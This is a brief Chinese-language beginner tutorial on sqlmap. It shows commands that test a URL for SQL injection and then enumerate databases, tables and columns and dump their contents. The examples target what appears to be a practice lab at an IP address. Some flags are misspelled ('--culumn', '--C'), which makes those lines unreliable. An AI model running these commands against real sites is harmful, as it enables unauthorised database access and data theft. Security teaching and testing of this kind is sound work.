sqlmap 基本使用方法(初级版)

sqlmap是一个很好的sql注入工具，操作简单，容易上手

sqlmap -u url                               //查看目标url是否存在sql注入漏洞
sqlmap -u url --dbs                                     //如果存在，爆破数据库
sqlmap -u url -D 数据库名 --tables                         //爆破表名
sqlmap -u url -D 数据库名 -T 表名 --culumn                        //爆破列名
sqlmap -u url -D 数据库名 -T 表名 --C 列名1，列名2                    //查询信息

命令说明

sqlmap  -u  目标url

当使用-u参数时，有前提条件。网页必须是get请求，初学者可理解为 网页后面有个问号

例如此url：http://45.32.81.200/vul/sqli/sqli_str.php

此url尾部无问号，因此不能用 -u 参数

但是，如果此时url为 http://45.32.81.200/vul/sqli/sqli_str.php？name=1   就可以使用了

特别注意       当url的问号后面有两个参数，需在url加双引号 

例如此url  http://45.32.81.200/vul/sqli/sqli_str.php？name=1&sex=2

就该这样使用：                 sqlmap -u "目标url"

 sqlmap -u "http://45.32.81.200/vul/sqli/sqli_str.php？name=1&sex=2"